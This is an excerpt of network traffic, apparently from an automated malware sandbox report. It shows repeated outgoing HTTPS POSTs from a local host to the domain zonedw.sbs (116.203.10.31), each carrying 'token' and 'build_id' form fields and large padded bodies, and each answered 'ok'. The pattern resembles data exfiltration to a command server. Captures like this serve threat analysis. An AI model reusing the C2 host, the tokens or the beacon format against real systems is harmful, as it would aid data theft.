2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	50121	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:46 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89R User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 Data Ascii: ------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------S0HVS2V3W4E3EUK6P89RCont
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:46 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:48 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	50123	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:47 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----16PP890HDJM7QQ1V3OH4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 Data Ascii: ------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------16PP890HDJM7QQ1V3OH4Cont
2024-12-14 11:57:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
